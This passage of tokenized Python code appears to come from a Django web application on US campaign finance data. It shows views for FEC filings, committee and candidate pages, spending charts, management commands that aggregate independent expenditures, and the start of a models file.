order_by ( '<STR_LIT>' ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : explanatory_text , <EOL> '<STR_LIT>' : ies , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def filing ( request , filing_num ) : <EOL> filing = get_object_or_404 ( new_filing , filing_number = filing_num ) <EOL> committee = None <EOL> title = "<STR_LIT>" % ( filing . committee_name , filing_num ) <EOL> if not filing . committee_name : <EOL> try : <EOL> committee = Committee_Overlay . objects . get ( fec_id = filing . fec_id , cycle = filing . cycle ) <EOL> title = "<STR_LIT>" % ( committee . get_absolute_url ( ) , committee . name , filing_num ) <EOL> except : <EOL> pass <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : filing , <EOL> '<STR_LIT>' : committee , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def filings_skeda ( request , filing_num ) : <EOL> filing_data = get_object_or_404 ( new_filing , filing_number = filing_num ) <EOL> title = "<STR_LIT>" % ( filing_data . get_committee_url ( ) , filing_data . committee_name , filing_data . get_absolute_url ( ) , filing_num ) <EOL> filings = None <EOL> too_many_to_display = False <EOL> if filing_data . lines_present : <EOL> lines_present = filing_data . lines_present . get ( '<STR_LIT:A>' ) <EOL> if int ( lines_present ) <= <NUM_LIT:1000> : <EOL> filings = SkedA . objects . filter ( filing_number = filing_num ) . 
order_by ( '<STR_LIT>' ) <EOL> else : <EOL> too_many_to_display = True <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : filings , <EOL> '<STR_LIT>' : too_many_to_display , <EOL> '<STR_LIT>' : filing_data , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def filings_skedb ( request , filing_num ) : <EOL> filing_data = get_object_or_404 ( new_filing , filing_number = filing_num ) <EOL> title = "<STR_LIT>" % ( filing_data . get_committee_url ( ) , filing_data . committee_name , filing_data . get_absolute_url ( ) , filing_num ) <EOL> filings = None <EOL> too_many_to_display = False <EOL> if filing_data . lines_present : <EOL> lines_present = filing_data . lines_present . get ( '<STR_LIT:B>' ) <EOL> if int ( lines_present ) <= <NUM_LIT:1000> : <EOL> filings = SkedB . objects . filter ( filing_number = filing_num ) . order_by ( '<STR_LIT>' ) <EOL> else : <EOL> too_many_to_display = True <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : filings , <EOL> '<STR_LIT>' : too_many_to_display , <EOL> '<STR_LIT>' : filing_data , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def filings_skede ( request , filing_num ) : <EOL> filing_data = get_object_or_404 ( new_filing , filing_number = filing_num ) <EOL> title = "<STR_LIT>" % ( filing_data . get_committee_url ( ) , filing_data . committee_name , filing_data . get_absolute_url ( ) , filing_num ) <EOL> filings = None <EOL> too_many_to_display = False <EOL> if filing_data . lines_present : <EOL> lines_present = filing_data . lines_present . get ( '<STR_LIT:E>' ) <EOL> if int ( lines_present ) <= <NUM_LIT:1000> : <EOL> filings = SkedE . objects . filter ( filing_number = filing_num ) . 
order_by ( '<STR_LIT>' ) <EOL> else : <EOL> too_many_to_display = True <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : filings , <EOL> '<STR_LIT>' : too_many_to_display , <EOL> '<STR_LIT>' : filing_data , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> """<STR_LIT>""" <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def committee ( request , slug , committee_id ) : <EOL> return redirect ( "<STR_LIT>" % ( slug , committee_id ) ) <EOL> """<STR_LIT>""" <EOL> @ cache_page ( <NUM_LIT:1> ) <EOL> def committee_cycle ( request , cycle , committee_id ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> cycle_endpoints = get_cycle_endpoints ( int ( cycle ) ) <EOL> committee_overlay = get_object_or_404 ( Committee_Overlay , fec_id = committee_id , cycle = int ( cycle ) ) <EOL> title = committee_overlay . name + "<STR_LIT>" % ( cycle ) <EOL> report_list = Committee_Time_Summary . objects . filter ( com_id = committee_id , coverage_from_date__gte = cycle_endpoints [ '<STR_LIT:start>' ] , coverage_from_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . order_by ( '<STR_LIT>' ) <EOL> end_of_coverage_date = committee_overlay . cash_on_hand_date <EOL> recent_report_list = None <EOL> if end_of_coverage_date : <EOL> relevant_date = max ( end_of_coverage_date , cycle_endpoints [ '<STR_LIT:start>' ] ) <EOL> recent_report_list = new_filing . objects . filter ( fec_id = committee_id , coverage_from_date__gte = relevant_date , coverage_to_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] , form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( is_f5_quarterly = True ) . exclude ( is_superceded = True ) <EOL> else : <EOL> recent_report_list = new_filing . objects . 
filter ( fec_id = committee_id , coverage_from_date__gte = cycle_endpoints [ '<STR_LIT:start>' ] , coverage_to_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] , form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( is_f5_quarterly = True ) . exclude ( is_superceded = True ) <EOL> independent_spending = Pac_Candidate . objects . filter ( committee = committee_overlay , total_ind_exp__gte = <NUM_LIT> , cycle = cycle ) . select_related ( '<STR_LIT>' ) <EOL> recent_ies = None <EOL> if committee_overlay . total_indy_expenditures > <NUM_LIT> : <EOL> recent_ies = SkedE . objects . filter ( filer_committee_id_number = committee_id , expenditure_amount__gte = <NUM_LIT> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:10> ] <EOL> cycle_values = Committee_Overlay . objects . filter ( fec_id = committee_id ) . 
exclude ( cycle = cycle ) <EOL> cycle_list = [ committee_overlay ] + list ( cycle_values ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : report_list , <EOL> '<STR_LIT>' : recent_report_list , <EOL> '<STR_LIT>' : committee_overlay , <EOL> '<STR_LIT>' : independent_spending , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : cycle_list , <EOL> '<STR_LIT>' : cycle , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> """<STR_LIT>""" <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def candidate ( request , slug , candidate_id ) : <EOL> return redirect ( "<STR_LIT>" % ( slug , candidate_id ) ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def candidate_cycle ( request , slug , candidate_id , cycle ) : <EOL> if not is_valid_four_digit_string_cycle ( cycle ) : <EOL> raise Http404 <EOL> cycles = Candidate_Overlay . objects . filter ( fec_id = candidate_id ) <EOL> candidate_overlay = None <EOL> try : <EOL> candidate_overlay = cycles . get ( cycle = cycle ) <EOL> except Candidate_Overlay . DoesNotExist : <EOL> if len ( cycles ) > <NUM_LIT:0> : <EOL> candidate_overlay = cycles . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> return redirect ( "<STR_LIT>" % ( candidate_overlay . cycle , slug , candidate_id ) ) <EOL> else : <EOL> raise Http404 <EOL> other_cycles = cycles . exclude ( cycle = cycle ) <EOL> cycle_list = [ candidate_overlay ] + list ( other_cycles ) <EOL> cycle_endpoints = get_cycle_endpoints ( int ( cycle ) ) <EOL> title = "<STR_LIT>" % ( candidate_overlay . name , candidate_overlay . party , cycle ) <EOL> authorized_committee_list = Authorized_Candidate_Committees . objects . filter ( candidate_id = candidate_id , cycle = cycle ) <EOL> committee_list = [ x . get ( '<STR_LIT>' ) for x in authorized_committee_list . values ( '<STR_LIT>' ) ] <EOL> report_list = Committee_Time_Summary . objects . 
filter ( com_id__in = committee_list , coverage_from_date__gte = cycle_endpoints [ '<STR_LIT:start>' ] , coverage_through_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . order_by ( '<STR_LIT>' ) <EOL> end_of_coverage_date = None <EOL> recent_report_list = None <EOL> if report_list : <EOL> end_of_coverage_date = report_list [ <NUM_LIT:0> ] . coverage_through_date <EOL> recent_report_total = <NUM_LIT:0> <EOL> if end_of_coverage_date : <EOL> recent_report_list = new_filing . objects . filter ( fec_id__in = committee_list , coverage_from_date__gte = end_of_coverage_date , coverage_to_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] , form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( is_superceded = True ) <EOL> if recent_report_list : <EOL> recent_report_total = recent_report_list . aggregate ( spending_total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> else : <EOL> recent_report_list = new_filing . objects . filter ( fec_id__in = committee_list , coverage_from_date__gte = cycle_endpoints [ '<STR_LIT:start>' ] , coverage_to_date__lte = cycle_endpoints [ '<STR_LIT:end>' ] , form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( is_superceded = True ) <EOL> outside_spenders = Pac_Candidate . objects . filter ( candidate = candidate_overlay , cycle = cycle , total_ind_exp__gte = <NUM_LIT:1000> ) . select_related ( '<STR_LIT>' ) <EOL> recent_ies = None <EOL> if outside_spenders : <EOL> recent_ies = SkedE . objects . filter ( candidate_checked = candidate_overlay , expenditure_amount__gte = <NUM_LIT> , superceded_by_amendment = False , expenditure_date_formatted__gte = cycle_endpoints [ '<STR_LIT:start>' ] , expenditure_date_formatted__lte = cycle_endpoints [ '<STR_LIT:end>' ] ) . select_related ( '<STR_LIT>' ) . 
order_by ( '<STR_LIT>' ) [ : <NUM_LIT:10> ] <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : report_list , <EOL> '<STR_LIT>' : candidate_overlay , <EOL> '<STR_LIT>' : authorized_committee_list , <EOL> '<STR_LIT>' : outside_spenders , <EOL> '<STR_LIT>' : recent_report_list , <EOL> '<STR_LIT>' : recent_ies , <EOL> '<STR_LIT>' : recent_report_total , <EOL> '<STR_LIT>' : cycle_list , <EOL> '<STR_LIT>' : cycle <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def subscribe ( request ) : <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def committee_search_html ( request ) : <EOL> params = request . GET <EOL> committees = None <EOL> try : <EOL> committee_name_fragment = params [ '<STR_LIT:name>' ] <EOL> if len ( committee_name_fragment ) > <NUM_LIT:3> : <EOL> print committee_name_fragment <EOL> committees = Committee_Overlay . objects . filter ( Q ( name__icontains = committee_name_fragment ) | Q ( curated_candidate__name__icontains = committee_name_fragment ) ) . select_related ( '<STR_LIT>' ) <EOL> else : <EOL> committees = None <EOL> except KeyError : <EOL> committees = None <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : committees , <EOL> } <EOL> ) <EOL> @ cache_control ( no_cache = True ) <EOL> def top_races ( request , week_number ) : <EOL> week_start = get_week_start ( int ( week_number ) ) <EOL> week_start_formatted = week_start . strftime ( '<STR_LIT>' ) <EOL> week_end = get_week_end ( int ( week_number ) ) <EOL> week_end_formatted = week_end . strftime ( '<STR_LIT>' ) <EOL> period_start = week_start - datetime . timedelta ( days = <NUM_LIT> ) <EOL> weeklysummaries = DistrictWeekly . objects . 
filter ( cycle_week_number = week_number , outside_spending__gte = <NUM_LIT:1000> ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:3> ] <EOL> title = "<STR_LIT>" % ( week_start_formatted , week_end_formatted ) <EOL> previous_week_number = None <EOL> following_week_number = None <EOL> if int ( week_number ) > <NUM_LIT:1> : <EOL> previous_week_number = int ( week_number ) - <NUM_LIT:1> <EOL> if int ( week_number ) < get_week_number ( datetime . date . today ( ) ) : <EOL> following_week_number = int ( week_number ) + <NUM_LIT:1> <EOL> district_ids = weeklysummaries . values ( "<STR_LIT>" ) <EOL> district_id_list = [ str ( x [ '<STR_LIT>' ] ) for x in district_ids ] <EOL> district_list = "<STR_LIT:U+002C>" . join ( district_id_list ) <EOL> data_url = "<STR_LIT>" % ( int ( week_number ) - <NUM_LIT:2> , week_number , district_list ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : period_start , <EOL> '<STR_LIT>' : week_start , <EOL> '<STR_LIT>' : week_end , <EOL> '<STR_LIT>' : weeklysummaries , <EOL> '<STR_LIT>' : previous_week_number , <EOL> '<STR_LIT>' : following_week_number , <EOL> '<STR_LIT>' : week_number , <EOL> '<STR_LIT>' : data_url , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_control ( no_cache = True ) <EOL> def top_current_races ( request ) : <EOL> week_number = get_week_number ( datetime . date . today ( ) ) - <NUM_LIT:1> <EOL> week_start = get_week_start ( int ( week_number ) ) <EOL> week_start_formatted = week_start . strftime ( '<STR_LIT>' ) <EOL> week_end = get_week_end ( int ( week_number ) ) <EOL> week_end_formatted = week_end . strftime ( '<STR_LIT>' ) <EOL> previous_week_number = int ( week_number ) - <NUM_LIT:1> <EOL> following_week_number = int ( week_number ) + <NUM_LIT:1> <EOL> period_start = week_start - datetime . timedelta ( days = <NUM_LIT> ) <EOL> weeklysummaries = DistrictWeekly . objects . 
filter ( cycle_week_number = week_number , outside_spending__gt = <NUM_LIT:1000> ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:3> ] <EOL> title = "<STR_LIT>" % ( week_start_formatted , week_end_formatted ) <EOL> district_ids = weeklysummaries . values ( "<STR_LIT>" ) <EOL> district_id_list = [ str ( x [ '<STR_LIT>' ] ) for x in district_ids ] <EOL> district_list = "<STR_LIT:U+002C>" . join ( district_id_list ) <EOL> data_url = "<STR_LIT>" % ( int ( week_number ) - <NUM_LIT:2> , week_number , district_list ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : previous_week_number , <EOL> '<STR_LIT>' : following_week_number , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : period_start , <EOL> '<STR_LIT>' : week_start , <EOL> '<STR_LIT>' : week_end , <EOL> '<STR_LIT>' : weeklysummaries , <EOL> '<STR_LIT>' : week_number , <EOL> '<STR_LIT>' : data_url , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> @ cache_page ( LONG_CACHE_TIME ) <EOL> def election_calendar ( request ) : <EOL> title = "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : elections_by_day , <EOL> '<STR_LIT:title>' : title , <EOL> } <EOL> ) <EOL> def chart_test ( request , blog_or_feature ) : <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : blog_or_feature <EOL> } <EOL> ) <EOL> def chart_listing ( request ) : <EOL> chart_list = [ ] <EOL> for key in chart_name_reference : <EOL> value = chart_name_reference [ key ] <EOL> value [ '<STR_LIT>' ] = key <EOL> print value <EOL> chart_list . append ( value ) <EOL> chart_list . 
sort ( key = lambda x : x [ '<STR_LIT:name>' ] ) <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : chart_list , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> ) <EOL> def senate_races ( request , blog_or_feature ) : <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : blog_or_feature , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def roi_chart ( request , blog_or_feature ) : <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : blog_or_feature , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def weekly_comparison ( request , race_list , blog_or_feature ) : <EOL> print "<STR_LIT>" <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> race_ids = race_list . split ( '<STR_LIT:->' ) <EOL> if len ( race_ids ) == <NUM_LIT:0> or len ( race_ids ) > <NUM_LIT:6> : <EOL> raise Http404 <EOL> race_id_text = "<STR_LIT:U+002C>" . 
join ( race_ids ) <EOL> chart_title = "<STR_LIT>" <EOL> partisan_colors = '<STR_LIT:false>' <EOL> try : <EOL> chart_data = chart_name_reference [ race_list ] <EOL> chart_title = chart_data [ '<STR_LIT:name>' ] <EOL> partisan_colors = chart_data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> for i , id in enumerate ( race_ids ) : <EOL> try : <EOL> series_name = weekly_dump_data_series [ int ( id ) ] [ '<STR_LIT>' ] <EOL> if i > <NUM_LIT:0> : <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> chart_title = chart_title + series_name <EOL> except IndexError : <EOL> continue <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : race_id_text , <EOL> '<STR_LIT>' : chart_title , <EOL> '<STR_LIT>' : blog_or_feature , <EOL> '<STR_LIT>' : partisan_colors , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def weekly_comparison_cumulative ( request , race_list , blog_or_feature ) : <EOL> print "<STR_LIT>" <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> race_ids = race_list . split ( '<STR_LIT:->' ) <EOL> if len ( race_ids ) == <NUM_LIT:0> or len ( race_ids ) > <NUM_LIT:6> : <EOL> raise Http404 <EOL> race_id_text = "<STR_LIT:U+002C>" . 
join ( race_ids ) <EOL> chart_title = "<STR_LIT>" <EOL> partisan_colors = '<STR_LIT:false>' <EOL> try : <EOL> chart_data = chart_name_reference [ race_list ] <EOL> chart_title = chart_data [ '<STR_LIT:name>' ] <EOL> partisan_colors = chart_data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> for i , id in enumerate ( race_ids ) : <EOL> try : <EOL> series_name = weekly_dump_data_series [ int ( id ) ] [ '<STR_LIT>' ] <EOL> if i > <NUM_LIT:0> : <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> chart_title = chart_title + series_name <EOL> except IndexError : <EOL> continue <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : race_id_text , <EOL> '<STR_LIT>' : chart_title , <EOL> '<STR_LIT>' : blog_or_feature , <EOL> '<STR_LIT>' : partisan_colors , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def contrib_comparison ( request , race_list , blog_or_feature ) : <EOL> print "<STR_LIT>" <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> race_ids = race_list . split ( '<STR_LIT:->' ) <EOL> if len ( race_ids ) == <NUM_LIT:0> or len ( race_ids ) > <NUM_LIT:6> : <EOL> raise Http404 <EOL> race_id_text = "<STR_LIT:U+002C>" . 
join ( race_ids ) <EOL> chart_title = "<STR_LIT>" <EOL> partisan_colors = '<STR_LIT:false>' <EOL> try : <EOL> chart_data = chart_donor_name_reference [ race_list ] <EOL> chart_title = chart_data [ '<STR_LIT:name>' ] <EOL> partisan_colors = chart_data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> for i , id in enumerate ( race_ids ) : <EOL> try : <EOL> series_name = weekly_dump_data_series [ int ( id ) ] [ '<STR_LIT>' ] <EOL> if i > <NUM_LIT:0> : <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> chart_title = chart_title + series_name <EOL> except IndexError : <EOL> continue <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : race_id_text , <EOL> '<STR_LIT>' : chart_title , <EOL> '<STR_LIT>' : blog_or_feature , <EOL> '<STR_LIT>' : partisan_colors , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def contrib_comparison_cumulative ( request , race_list , blog_or_feature ) : <EOL> print "<STR_LIT>" <EOL> if not ( blog_or_feature in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise Http404 <EOL> race_ids = race_list . split ( '<STR_LIT:->' ) <EOL> if len ( race_ids ) == <NUM_LIT:0> or len ( race_ids ) > <NUM_LIT:6> : <EOL> raise Http404 <EOL> race_id_text = "<STR_LIT:U+002C>" . 
join ( race_ids ) <EOL> chart_title = "<STR_LIT>" <EOL> partisan_colors = '<STR_LIT:false>' <EOL> try : <EOL> chart_data = chart_donor_name_reference [ race_list ] <EOL> chart_title = chart_data [ '<STR_LIT:name>' ] <EOL> partisan_colors = chart_data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> for i , id in enumerate ( race_ids ) : <EOL> try : <EOL> series_name = weekly_dump_data_series [ int ( id ) ] [ '<STR_LIT>' ] <EOL> if i > <NUM_LIT:0> : <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> chart_title = chart_title + series_name <EOL> except IndexError : <EOL> continue <EOL> chart_title = chart_title + "<STR_LIT>" <EOL> return render_to_response ( '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : race_id_text , <EOL> '<STR_LIT>' : chart_title , <EOL> '<STR_LIT>' : blog_or_feature , <EOL> '<STR_LIT>' : partisan_colors , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) </s>
<s> import json <EOL> from optparse import make_option <EOL> from summary_data . models import District , Candidate_Overlay <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> requires_model_validation = False <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT:state>' , <EOL> help = "<STR_LIT>" ) , <EOL> ) <EOL> def handle ( self , * args , ** options ) : <EOL> state = options [ '<STR_LIT:state>' ] <EOL> assert state , "<STR_LIT>" <EOL> candidate_list = [ ] <EOL> races = District . objects . filter ( state = state , election_year = <NUM_LIT> ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for race in races : <EOL> candidates = Candidate_Overlay . objects . filter ( district = race ) . exclude ( not_seeking_reelection = True ) . order_by ( '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> for candidate in candidates : <EOL> candidate_list . append ( { "<STR_LIT:id>" : candidate . pk , "<STR_LIT>" : candidate . fec_id , "<STR_LIT>" : candidate . is_incumbent , "<STR_LIT:name>" : candidate . name , "<STR_LIT>" : candidate . party , "<STR_LIT>" : candidate . office , "<STR_LIT>" : candidate . office_district , "<STR_LIT>" : candidate . candidate_status } ) <EOL> print json . dumps ( candidate_list , sort_keys = True , indent = <NUM_LIT:4> , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import date <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from django . db . models import Sum <EOL> from django . conf import settings <EOL> from formdata . models import SkedE <EOL> from summary_data . models import Pac_Candidate , Candidate_Overlay , Committee_Overlay <EOL> from shared_utils . cycle_utils import cycle_calendar <EOL> try : <EOL> ACTIVE_CYCLES = settings . ACTIVE_CYCLES <EOL> except : <EOL> print "<STR_LIT>" <EOL> ACTIVE_CYCLES = [ '<STR_LIT>' ] <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> requires_model_validation = False <EOL> def handle ( self , * args , ** options ) : <EOL> for cycle in ACTIVE_CYCLES : <EOL> print "<STR_LIT>" % cycle <EOL> committee_list = Pac_Candidate . objects . filter ( cycle = cycle ) . values ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) . distinct ( ) <EOL> for ie_committee in committee_list : <EOL> fec_id = ie_committee [ '<STR_LIT>' ] <EOL> total_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> dem_support_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , candidate__party__iexact = '<STR_LIT:D>' , support_oppose__iexact = '<STR_LIT:S>' , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> rep_support_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , candidate__party__iexact = '<STR_LIT:R>' , support_oppose__iexact = '<STR_LIT:S>' , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> dem_oppose_ies = Pac_Candidate . objects . filter ( committee__fec_id = fec_id , candidate__party__iexact = '<STR_LIT:D>' , support_oppose__iexact = '<STR_LIT:O>' , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> rep_oppose_ies = Pac_Candidate . objects . 
filter ( committee__fec_id = fec_id , candidate__party__iexact = '<STR_LIT:R>' , support_oppose__iexact = '<STR_LIT:O>' , cycle = cycle ) . aggregate ( total = Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % ( fec_id , total_ies , dem_support_ies , rep_support_ies , dem_oppose_ies , rep_oppose_ies ) <EOL> try : <EOL> this_committee = Committee_Overlay . objects . get ( fec_id = fec_id , cycle = cycle ) <EOL> except Committee_Overlay . DoesNotExist : <EOL> continue <EOL> this_committee . total_indy_expenditures = total_ies <EOL> this_committee . ie_support_dems = dem_support_ies <EOL> this_committee . ie_support_reps = rep_support_ies <EOL> this_committee . ie_oppose_dems = dem_oppose_ies <EOL> this_committee . ie_oppose_reps = rep_oppose_ies <EOL> this_committee . save ( ) </s>
<s> import datetime <EOL> from django . db import models <EOL> from django . utils . text import slugify <EOL> from ftpdata . models import Candidate <EOL> from legislators . models import Legislator <EOL> from api . nulls_last_queryset import NullsLastManager <EOL> from data_references import STATES_FIPS_DICT , STATE_CHOICES_DICT , STATE_CHOICES , ELECTION_TYPE_CHOICES , ELECTION_TYPE_DICT , CANDIDATE_STATUS_CHOICES , CANDIDATE_STATUS_DICT , type_hash_full , type_hash , committee_designation_hash <EOL> class Update_Time ( models . Model ) : <EOL> key = models . SlugField ( max_length = <NUM_LIT:255> ) <EOL> update_time = models . DateTimeField ( ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . update_time = datetime . datetime . today ( ) <EOL> super ( Update_Time , self ) . save ( * args , ** kwargs ) <EOL> class District ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = STATE_CHOICES , help_text = "<STR_LIT>" ) <EOL> incumbent_legislator = models . ForeignKey ( Legislator , null = True ) <EOL> office = models . CharField ( max_length = <NUM_LIT:1> , null = True , <EOL> choices = ( ( '<STR_LIT:H>' , '<STR_LIT>' ) , ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:P>' , '<STR_LIT>' 